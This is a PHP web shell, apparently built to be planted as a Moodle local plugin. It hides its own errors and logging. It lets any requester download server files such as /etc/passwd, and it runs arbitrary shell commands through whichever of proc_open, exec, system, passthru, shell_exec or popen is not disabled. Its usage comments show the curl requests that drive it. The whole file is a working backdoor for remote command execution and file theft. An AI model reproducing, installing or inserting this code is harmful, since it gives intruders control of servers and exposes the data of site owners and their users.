<?php
@error_reporting(0);
@ini_set('display_errors','Off');
@ini_set('ignore_repeated_errors', 0);
@ini_set('log_errors', 0);
@ini_set('max_execution_time',0);
@ini_set('memory_limit', '128M');
$chunk_size = 4096;
$action = $_REQUEST["action"];
if($action == "download"){
	/*
	* USAGE:
	* curl -X POST 'http://127.0.0.1/local/moodle_webshell/rce_local.php' --data "action=download&path=/etc/passwd"
	*/	
	$path_to_file = $_REQUEST["path"];
	if(file_exists($path_to_file)){
		http_response_code(200);
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename="'.basename($path_to_file).'"');
      header('Expires: 0');
      header('Cache-Control: must-revalidate');
      header('Pragma: public');
      header('Content-Length: '.filesize($path_to_file));
      flush();
      readfile($path_to_file);
      die();
	} else {
		http_response_code(404);
      header("Content-Type: application/json");
      echo json_encode(["message" => "Path " . $path_to_file . " does not exist or is not readable.", "path" => $path_to_file]);
    }
} else if(in_array($action, ['proc_open','exec','system','passthru','shell_exec','resource'])){
	/*
	* USAGE:
	* curl -X POST 'http://127.0.0.1/local/moodle_webshell/rce_local.php' --data "action=[proc_open,exec,system,passthru,shell_exec,resource]&cmd=[command]"
	*/
	function disFunc(){
		$disfunc = @ini_get('disable_functions');	
		return !empty($disfunc) ? explode(',', $disfunc) : [];
	}
	function procopen($cmd){
		global $chunk_size;
		$descriptorspec = array(
			0 => array("pipe", "r"),  // stdoin
			1 => array("pipe", "w"),  // stdout
			2 => array("pipe", "w")   // stderr
		);
		$process = proc_open($cmd, $descriptorspec, $pipes);
		if(is_resource($process)){
			$stdout = ""; $buffer = "";
			do {
				$buffer = fread($pipes[1], $chunk_size);
				$stdout = $stdout . $buffer;
			} while ((!feof($pipes[1])) && (strlen($buffer) != 0));
			$stderr = ""; $buffer = "";
			do {
				$buffer = fread($pipes[2], $chunk_size);
				$stderr = $stderr . $buffer;
			} while ((!feof($pipes[2])) && (strlen($buffer) != 0));
			fclose($pipes[1]);
			fclose($pipes[2]);
			$outr = !empty($stdout) ? $stdout : $stderr;
		} else {
			$outr = 'Gagal eksekusi pak!, proc_open failed!';
			exit(1);
		}
		proc_close($process);
		echo $outr;
	}
	function ex($type, $in){
		global $chunk_size;
		$out = '';
		$disfuncs = disFunc();
		switch($type){
			case 'proc_open' :
				if(function_exists("proc_open")){
					if(!in_array("proc_open", $disfuncs)){
						ob_start();
						procopen($in);
						$out = ob_get_clean();
						return $out;
					}
				} else {
					$out = "proc_open gak tersedia!";
				}
			break;
			case 'exec':
				if(function_exists("exec")){
					if(!in_array("exec", $disfuncs)){
						@exec($in, $out);
						$out = @join("\n",$out);
						return $out;
					}
				} else {
					$out = "exec gak tersedia!";
				}
			break;
			case 'passthru':
				if(function_exists("passthru")){
					if(!in_array("passthru", $disfuncs)){
						ob_start();
						@passthru($in);
						$out = ob_get_clean();
						return $out;
					}
				} else {
					$out = "passthru gak tersedia!";
				}
			break;
			case 'system':
				if(function_exists("system")){
					if(!in_array("system", $disfuncs)){
						ob_start();
						@system($in);
						$out = ob_get_clean();
						return $out;
					}
				} else {
					$out = "system gak tersedia!";
				}
			break;
			case 'shell_exec':
				if(function_exists("shell_exec")){
					if(!in_array("shell_exec", $disfuncs)){
						$out = shell_exec($in);
						return $out;
					}
				} else {
					$out = "shell_exec gak tersedia!";
				}
			break;
			case 'resource':
				if(is_resource($f = @popen($in, "r"))){
					$out = "";
					while(!@feof($f))
						$out .= fread($f, $chunk_size);
					fclose($f);
					return $out;
				} else {
					$out = "resource yang dimaksud gak ada!";
				}
			break;
			default : $out = "gak bisa jalanin perintah pak!";
		}
		return $out;
	}
	header("Content-Type: text/plain");
	$command = $_REQUEST["cmd"];
	echo iconv('UTF-8', 'UTF-8', addcslashes("[disable_functions]\n".implode(', ', disFunc())."\n\n[command]\n~$ {$command}\n\n[response]\n".ex($action, $command)."", "\r\t\\'\0"));	
}
?>